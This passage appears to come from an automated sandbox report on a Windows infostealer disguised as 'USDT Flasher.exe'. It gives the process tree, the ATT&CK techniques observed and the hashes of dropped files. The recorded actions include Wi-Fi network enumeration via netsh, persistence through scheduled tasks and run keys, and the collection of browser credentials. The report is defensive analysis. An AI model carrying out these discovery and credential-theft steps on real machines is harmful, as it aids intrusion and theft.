C:\Windows\SysWOW64\chcp.comchcp 650014⤵
- System Location Discovery: System Language Discovery
PID:2228
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2148
-
-
-
-
C:\Users\Admin\AppData\Roaming\USDT Flasher.exe"C:\Users\Admin\AppData\Roaming\USDT Flasher.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2772
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8BFAB656-E7C9-4B39-B8B4-BDD07B7144DD} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]1⤵PID:1744
-
C:\Users\Admin\AppData\Local\Interrupi.exeC:\Users\Admin\AppData\Local\Interrupi.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
C:\Users\Admin\AppData\Local\Interrupi.exeC:\Users\Admin\AppData\Local\Interrupi.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Users\Admin\AppData\Local\Interrupi.exeC:\Users\Admin\AppData\Local\Interrupi.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\2469301daede32439e751560d91d18f4\Admin@PJCSDMRP_en-US\Browsers\Firefox\Bookmarks.txt
Filesize105B
MD52e9d094dda5cdc3ce6519f75943a4ff4
SHA15d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
229B
MD55623353a38611880912397750358a0cf
SHA11abfda3058cae5b11da3e6551fbec2eb354a25d3
SHA2564b97706d98357279a5f3f1c720f384a47d020a1fbb6aac5460e1d87786aba86c
SHA51278b78820ce33341f40f71924087d255b6ec74472bb22562a2bfadf5f090662c691d5a293f5f8148477f414cf7f38c53c490b595489d79966d944dfe73097f0fb
-
Filesize
226KB
MD51bf114677a69802600ff29c5ce65f464
SHA19d05e8414eea793f8260bfb05f359c9b056c7e43
SHA25657b0c0581e640d275739c192361ec44d4d2af6db1dc74ea4e7e77e1c5e666736
SHA512d111b149ef24c165976dd37a16e5525f73752a4f3ec66d0cf4faace019e27a8e09815655bbdfe428791dbda365e1172819a820df19d0a5647f21fcadf1afabe2
-
Filesize
94KB
MD5cbe1be5547cc26f924d6fa48b4abca92
SHA1972f9afdb39425a4764be0a91552613e49eba7f3
SHA256549565dab31274ecd5370f02766116260e56390b405231ddaf3a7186395f1d9f
SHA512be567464ab80a4c00f7b499c1b645cf2ef301242a5feffad1b6dca8b2281f066a9f0ae63fbf8715c3e3c3b0dc6c8e1093d057ff245c5de5f8b39da37eb56a272
-
Filesize
33KB
MD517e158e0f91dcc8168f2e416035926ed
SHA1aac8bf1174db86568aab282b8a8de953c372ef1e
SHA256bb0ef384a2d6f8fff82eecd15908bd39146ffa65810c2c56934c32c88abac94b
SHA512383df3fa4eaecbfc6698961d3a8f5fe726db3e0cddf83f357bc9f2947328a284f4fe5b13f2eb866ea9c50eafbb5fc45b788b8401edffcbfc5bf068f545dd167c
-
Filesize
775KB
MD58584a85ec4f91388e65c963c2b458f33
SHA1023812da246e015601307c357cd4c685df28977c
SHA256a4c72195c7e45148d8c98c6a58c9c71dc480d496c2daad053b4bfab581225f62
SHA512b72bb8d9b842c145c5f3b0a2dfb9eac21e297c871388150386e5f74f4946e8a616e597a3d7a63eff8919789c9527f2f4e4861b4f76ff3713c80c292e9105e9f6
-
Filesize
72KB
MD533fba80c2580eebf95e25dea03331f68
SHA1d0ed67fbbff537eb393206fc41c18d59b9a4bb3c
SHA2564cbe94aefe8a24ebac9fb5c11c1efc89c15b1a7b1a2bf3587baface318ee4b2b
SHA5128213c45c68a38984a2ad11ab0651ae9933dc538ff260e31753f2f9c3aacff038048bcf2680bb7993b5f4005f48ae7e5c74e7325bdf6ef20df1ae7aa58f7ae4bc